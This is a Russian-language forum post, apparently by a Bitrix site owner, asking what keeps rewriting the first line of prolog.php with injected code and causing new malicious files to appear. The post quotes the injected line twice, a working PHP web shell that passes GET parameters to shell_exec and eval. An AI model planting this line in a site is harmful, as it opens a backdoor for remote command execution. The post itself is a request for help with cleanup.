В файле /bitrix/modules/main/include/prolog.php регулярно заменяется 1-ая строка на такой код:
[code]
<?if(isset($_GET['micat']))echo shell_exec($_GET['micat']);if(isset($_GET['midog']))echo eval($_GET['midog']);
[/code]
Если не удалить этот кусок кода, то на сайте начинают появляться другие вирусные файлы.
Как понять, что именно заменяет код в этом файле?
Вирусные файлы удалил после сканирования. Список агентов чист.
[code]
<?if(isset($_GET['micat']))echo shell_exec($_GET['micat']);if(isset($_GET['midog']))echo eval($_GET['midog']);
[/code]
Если не удалить этот кусок кода, то на сайте начинают появляться другие вирусные файлы.
Как понять, что именно заменяет код в этом файле?
Вирусные файлы удалил после сканирования. Список агентов чист.